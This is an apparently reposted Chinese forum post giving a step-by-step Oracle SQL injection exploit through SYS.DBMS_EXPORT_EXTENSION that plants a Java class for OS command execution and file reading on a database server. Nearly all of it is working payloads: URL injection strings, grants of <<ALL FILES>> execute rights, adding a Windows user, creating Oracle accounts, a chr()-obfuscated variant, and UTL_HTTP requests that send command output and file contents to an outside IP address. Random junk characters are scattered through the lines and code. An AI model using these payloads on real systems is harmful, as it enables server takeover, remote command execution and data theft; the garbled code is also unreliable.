以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
- ~/ q4 F# }! o" n( D' _6 h6 `3 e4 [# D
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) 5 X. ^: o1 h$ i. T, Z, {
的形式即可。(用" 'a'|| "是为了让语句返回true值)
, @% [; D+ |7 Z4 [语句有点长,可能要用post提交。 % ^% i( A( A1 z+ B
以下是各个步骤: ; l r; v% d9 o
1.创建包 + b1 v0 F2 c! ~: u0 N, ]& O' H
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:8 P, r) _$ F1 P# n
/xxx.jsp?id=1 and '1'<>'a'||(
6 U4 N2 v1 {: r9 [( c3 P& v$ \4 dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 A" ?! y4 n$ H' H" |5 W( Zcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader() b D/ S7 j {3 u2 L) V
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
4 U2 T; p9 d( L3 V: v1 s}'''';END;'';END;--','SYS',0,'1',0) from dual
1 t0 n# i# u6 ^" v3 s) t5 E) . f. \- u& w, V: e; `
------------------------
& ~6 c2 R6 q% C如果url有长度限制,可以把readFile()函数块去掉,即:
# `3 B0 q5 c5 M; F7 Z/xxx.jsp?id=1 and '1'<>'a'||( : y/ @( w# H Q$ _
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
! |% j- V: B% Q. x( x! s( Zcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader( T2 i( h; ]0 ]5 T. v- u; Z
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}' S/ B) r& z1 r2 |! M
}'''';END;'';END;--','SYS',0,'1',0) from dual
( M) Z8 @$ m7 z) 3 {! G9 d0 W9 g. s: a
同时把后面步骤 提到的 对readFile()的处理语句去掉。
3 R0 @3 D! `( ?& u, M# A [------------------------------ 7 a- n; i5 q; [
2.赋Java权限
2 m K D4 T/ {; mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
* n- I$ _+ ?$ |- e# V3.创建函数
m8 }6 m, j" l+ K2 a6 f( J. tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''2 _: H+ J2 x9 b* M8 G1 U4 ]
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
6 s. r% C6 A: J zselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''0 b2 Y9 ^; C. P
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual. v. |8 u6 i$ p. l/ x& S
4.赋public执行函数的权限
: J T7 i1 Q. Z' j3 `% \select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual) e+ t7 }6 i6 A7 [
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual) x/ p0 }% o8 x4 k- F; ^! Q
5.测试上面的几步是否成功
2 U i5 c9 c- P' O3 `and '1'<>'11'||( 0 }0 C; ^* l, ]$ _' S" q
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
4 W; N) e o4 ^) " l" d/ R+ w! {1 V8 O1 P6 L+ H
and '1'<>(
6 W# O* W* m, }3 J/ sselect OBJECT_ID from all_objects where object_name ='LINXREADFILE' & u" n# }' G# ]2 ], w( A/ r
) ( S! s* @2 j4 T( T& g
6.执行命令: ' k0 R# g% R1 m$ P
/xxx.jsp?id=1 and '1'<>( 7 G) x% O7 d9 d
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
2 S# P7 C) q( Y6 J) _+ ?
2 n/ o. [" _# s8 q) * o4 y( [* z- F6 d2 b M9 |
/xxx.jsp?id=1 and '1'<>(
) z1 `( q/ B% V: b! k: i' Bselect sys.LinxReadFile('c:/boot.ini') from dual
+ w3 z4 p) G9 ]8 I! C1 v! j. k; W% f
)
, J$ }1 M' n) A + f& {9 t8 j4 z7 E) n
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 ' X/ ` ?" d, N0 W7 n
如果要查看运行结果可以用 union : 4 _, v! R2 e/ r- v3 @( _8 Q
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
1 o3 i, y/ [- N或者UTL_HTTP.request(: ; f2 a$ m8 n. J$ j5 J$ z
/xxx.jsp?id=1 and '1'<>(
& j5 N( x; C+ ~5 cSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual' _* u. X B8 P% E
) 2 r9 H! t5 f. ?" a* t% k5 S
/xxx.jsp?id=1 and '1'<>( 8 U1 U0 V+ n4 e$ L$ t" l4 ?
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
/ S3 i. }4 @2 L)
! g2 _3 y& g' b" G# _注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
+ k/ ^6 B& M* L1 @$ @% S5 R-------------------- 1 h8 x2 Y f& C
6.内部变化
! p- b$ A+ P7 ?/ P3 }5 Y( `通过以下命令可以查看all_objects表达改变: , W# F2 L+ ?: w( w) H$ `
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'! u" B5 x$ [3 x- R$ o
7.删除我们创建的函数 * q- X$ Z% [1 h0 h1 n" S9 v5 m
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''7 ^9 \4 ^. O1 c1 |4 L( P1 Q* I+ a
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
1 D0 m; b( A* x8 U6 v) ]====================================================
6 I. ?, D& w6 [6 d全文结束。谨以此文赠与我的朋友。 * n1 A8 J: v& ^$ j
linx
0 ]6 k7 P' i& B3 W( J" H0 Z124829445
* a, g# C5 \. y% l2008.1.12
) H+ I9 m) W+ E$ k* B8 K) a. P[email protected]
8 p, d- Q* o5 ]======================================================================
4 [+ f9 E1 |2 B2 }4 C' M测试漏洞的另一方法:
/ B+ O# U: H7 O5 V& b1 N" r2 W y创建oracle帐号: ( A6 R$ s0 S/ t `4 W% Q% q: @
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''6 U2 v- c8 t) w" F
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual% \) ^, U# S* |; A; O0 N
即: : U& e" \: x) P+ O/ H- S9 n
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
Z; O i Z5 E! E. lchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
- k& v! Q( e4 p% Y- G1 N Z/ L! U确定漏洞存在: 4 R% W' t& S) P) S c' G+ \. q& N
1<>(
) b% K, W% X# p/ R7 Fselect user_id from all_users where username='LINXSQL' - ^) a8 V- I n5 a( U+ c
)
/ s( B- V- Q% Z* p2 h给linxsql连接权限:
. `! y0 [5 ?+ E9 I5 [select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''! S3 _0 O F* ~; \$ P# [1 c5 m+ {/ G
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual & o) [# T. S6 s. I9 O5 \/ P- `7 Y
删除帐号: ; g& i9 G9 h$ J5 h+ m; f: b5 {
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''! M. O7 E/ J8 H4 L6 e# z
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual 6 B! P% @/ Z8 M: N$ g' q1 B) V/ b
====================== : v7 H K; B3 g9 O/ g) L
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:+ H6 T: ~' i6 O
1.jsp?id=1 and '1'<>( ) [- v6 l- B" f) P. u O( P) H# D
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 l. V' D: [+ E- n
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
, I$ Z2 b: {* q. k& v) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE s7 Z% z# U K
); ]0 Y. [( j$ A$ y- i$ W
6 M' G0 \8 F# \8 w
. T0 L0 f6 `5 s$ d) i
' Q) a& T" U1 D9 S3 N# x9 W |
发表于 2012-12-18 12:21:48
收藏
分享
支持
反对